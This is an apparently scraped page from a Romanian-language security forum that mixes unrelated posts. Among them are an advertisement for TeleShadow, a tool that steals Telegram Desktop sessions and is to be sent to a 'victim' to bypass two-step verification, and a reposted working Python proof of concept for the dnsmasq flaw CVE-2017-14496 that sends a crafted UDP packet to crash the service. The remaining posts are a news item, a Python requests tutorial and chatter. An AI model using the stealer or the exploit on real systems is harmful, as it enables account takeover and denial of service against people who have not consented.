Leaderboard

TeleShadow Stealing desktop telegrams has never been so easy ! Set the email and sender details of the sender and recipient and send it to the victim after compiling. How do I use the session file? Delete everything inside folder at "C:\Users\YourName\AppData\Roaming\Telegram Desktop\tdata" Then Replace Uncompressed files inside tdata folder who resiver from victim to your telegram tdata ! What features does it have? Bypass Two-step confirmation Bypass Inherent identity and need 5-digit verification code Support for the official telegram and IGram desktop unofficial only windows ! Thanks to jeje Plus mr3chb1 Rojhelat Report bugs Telegram : @N3verlove Disclaimer: The consequences of any use shall be borne by the person and the manufacturer or the publisher shall not be liable to any Download: TeleShadow-master.zip or git clone https://github.com/ParsingTeam/TeleShadow.git Source: https://github.com/ParsingTeam/TeleShadow

Author: Google Security Research | Category: dos/poc | Platform: multiple Date add: 02-10-2017 | Risk: [Security Risk Medium] | 0day-ID: 0day-ID-28727 | CVE: CVE-2017-14496 ''' Sources: https://raw.githubusercontent.com/google/security-research-pocs/master/vulnerabilities/dnsmasq/CVE-2017-14496.py https://security.googleblog.com/2017/10/behind-masq-yet-more-dns-and-dhcp.html dnsmasq is vulnerable only if one of the following option is specified: --add-mac, --add-cpe-id or --add-subnet. ================================================================= ==2215==ERROR: AddressSanitizer: negative-size-param: (size=-4) #0 0x4b55be in __asan_memcpy (/test/dnsmasq/src/dnsmasq+0x4b55be) #1 0x59a70e in add_pseudoheader /test/dnsmasq/src/edns0.c:164:8 #2 0x59bae8 in add_edns0_config /test/dnsmasq/src/edns0.c:424:12 #3 0x530b6b in forward_query /test/dnsmasq/src/forward.c:407:20 #4 0x534699 in receive_query /test/dnsmasq/src/forward.c:1448:16 #5 0x548486 in check_dns_listeners /test/dnsmasq/src/dnsmasq.c:1565:2 #6 0x5448b6 in main /test/dnsmasq/src/dnsmasq.c:1044:7 #7 0x7fb05e3cf2b0 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x202b0) #8 0x41cbe9 in _start (/test/dnsmasq/src/dnsmasq+0x41cbe9) 0x62200001ca2e is located 302 bytes inside of 5131-byte region [0x62200001c900,0x62200001dd0b) allocated by thread T0 here: #0 0x4cc700 in calloc (/test/dnsmasq/src/dnsmasq+0x4cc700) #1 0x5181b5 in safe_malloc /test/dnsmasq/src/util.c:267:15 #2 0x54186c in main /test/dnsmasq/src/dnsmasq.c:99:20 #3 0x7fb05e3cf2b0 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x202b0) SUMMARY: AddressSanitizer: negative-size-param (/test/dnsmasq/src/dnsmasq+0x4b55be) in __asan_memcpy ==2215==ABORTING ''' #!/usr/bin/python # # Copyright 2017 Google Inc # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # # Authors: # Fermin J. Serna <fjserna@google.com> # Felix Wilhelm <fwilhelm@google.com> # Gabriel Campana <gbrl@google.com> # Kevin Hamacher <hamacher@google.com> # Gynvael Coldwin <gynvael@google.com> # Ron Bowes - Xoogler :/ import socket import sys def negative_size_param(): data = '''00 00 00 00 00 00 00 00 00 00 00 04 00 00 29 00 00 3a 00 00 00 01 13 fe 32 01 13 79 00 00 00 00 00 00 00 01 00 00 00 61 00 08 08 08 08 08 08 08 08 08 08 08 08 08 08 00 00 00 00 00 00 00 00 6f 29 fb ff ff ff 00 00 00 00 00 00 00 00 00 03 00 00 00 00 00 00 00 00 02 8d 00 00 00 f9 00 00 00 00 00 00 00 00 00 00 00 5c 00 00 00 01 ff ff 00 35 13 01 0d 06 1b 00 00 00 00 00 00 00 00 00 00 00 04 00 00 29 00 00 3a 00 00 00 01 13 00 08 01 00 00 00 00 00 00 01 00 00 00 61 00 08 08 08 08 08 08 08 08 08 13 08 08 08 00 00 00 00 00 00 00 00 00 6f 29 fb ff ff ff 00 29 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 02 8d 00 00 00 f9 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 00 00 00 01 ff ff 00 35 13 00 00 00 00 00 b6 00 00 13 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 61 05 01 20 00 01 '''.replace(' ', '').replace('\n', '').decode('hex') return data if __name__ == '__main__': if len(sys.argv) != 3: print 'Usage: %s <ip> <port>' % sys.argv[0] sys.exit(0) ip = sys.argv[1] port = int(sys.argv[2]) packet = negative_size_param() s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) s.setsockopt(socket.SOL_SOCKET,socket.SO_BROADCAST, 1) s.sendto(packet, (ip, port)) s.close() # 0day.today [2017-10-03] # Source: 0day.today

Interesant, buna idee pentru un modul de Metasploit pentru cine are ceva timp liber.

Trump administration lawyers are demanding the private account information of potentially thousands of Facebook users in three separate search warrants served on the social media giant, according to court documents obtained by CNN. The warrants specifically target the accounts of three Facebook users who are described by their attorneys as "anti-administration activists who have spoken out at organized events, and who are generally very critical of this administration's policies." One of those users, Emmelia Talarico, operated the disruptj20 page where Inauguration Day protests were organized and discussed; the page was visited by an estimated 6,000 users whose identities the government would have access to if Facebook hands over the information sought in the search warrants. In court filings, Talarico says if her account information was given to the government, officials would have access to her "personal passwords, security questions and answers, and credit card information," plus "the private lists of invitees and attendees to multiple political events sponsored by the page." These warrants were first reported by LawNewz.com. Facebook went through seven months of legal proceedings so it could make all three of the Facebook users aware that the government attorneys wanted their online details. "We successfully fought in court to be able to notify the three people whose broad account information was requested by the government," a Facebook spokesperson said Friday. "We are grateful to the companies and civil society organizations that supported us in arguing for people's ability to learn about and challenge overly broad search warrants." http://edition.cnn.com/2017/09/28/politics/facebook-anti-administration-activists/index.html

Linux (prin extensie android) e open source. Linux kernel poate fi customizat si recompilat (desi in practica mai rar). In aditie restul de aplicatii si servicii sunt open source si interschimbabile. In plus aplicatiile pot fi configurate usor. De aia vezi versiuni linux cu diferite proproetati (cum ar fi ubuntu lubuntu, debian, mint etc). In opozitie Windows e closed source, microkernel. Partile nucleului (aka aplicatiile care ruleaza pe fundal default) sunt aproape imposibil de schimbat sau customizat. Deaia Windows 7 e doar un windows 7. (cu versiunile lui server home etc.) Exista incercari cum ar fi "Windows 9" (Windows 8.1 customizat de catre un student) dar astfel de proiecte nu au ajuns prea departe

Mia făcut și mie doua proiecte ,foarte bun băiatu și preturi rezonabile ,recomand

am lucrat si eu cu el,foarte de treaba si foarte serios+ca a durat mai putin decat imi spusese initial

Hello, In Python, it's really easy to work with API calls using the requests module. To install it, just do: pip install requests Unfortunately, depending on your version, the API is largely SOAP based. The simplest way to consume VMWare's API is via one of the existing SDKs. Now, moving further and looking at a newer version of VMWare docs, we can see that there's an already developed module to interfere with it named pyvmomi. You can follow the instructions from the github to set everything up. If you follow carefully those steps you will find this https://github.com/vmware/pyvmomi-community-samples/blob/master/samples/ which contains tons of examples. Now, literally speaking, if you specifically need to play a bit with requests, you can do the following: 1. Import the needed modules 2. Make GET requests 3. Process the data 4. POST processed data 1. Import the needed modules import requests 2. Make GET requests GET_URL = 'https://httpbin.org/get' POST_URL = 'https://httpbin.org/post' data = requests.get(GET_URL).json() # this will be a json data structure containing the data you need The output of the above is: {'args': {}, 'headers': {'Accept': '*/*', 'Accept-Encoding': 'gzip, deflate', 'Connection': 'close', 'Host': 'httpbin.org', 'User-Agent': 'python-requests/2.18.1'}, 'origin': '86.120.146.226', 'url': 'https://httpbin.org/get'} 3. Process the data Let's suppose you want to modify the origin value into something else: data['origin'] = 'something else' 4. POST processed data r = requests.post(POST_URL, data=data) print(r.text) Now, the output of the above will be: { "args": {}, "data": "", "files": {}, "form": { "headers": [ "Accept", "Accept-Encoding", "Connection", "Host", "User-Agent" ], "origin": "something else", "url": "https://httpbin.org/get" }, "headers": { "Accept": "*/*", "Accept-Encoding": "gzip, deflate", "Connection": "close", "Content-Length": "147", "Content-Type": "application/x-www-form-urlencoded", "Host": "httpbin.org", "User-Agent": "python-requests/2.18.1" }, "json": null, "origin": "86.120.146.226", "url": "https://httpbin.org/post" } Now, regarding your unicode issue, the error was raised because the data is a unicode/str variable, which means that you first have to make it a JSON object (which is basically a dict). In my example, you can see that I already called .json() which makes sure the data is a JSON object. But, if the returned data is a string, you won't be able to do that. To do that, you can use the json module: import json data = json.loads(data)

Nu merge acest tutorial, si site-ul este creat in scopul de a da noi click-uri la acele reclame

Da!

// Spam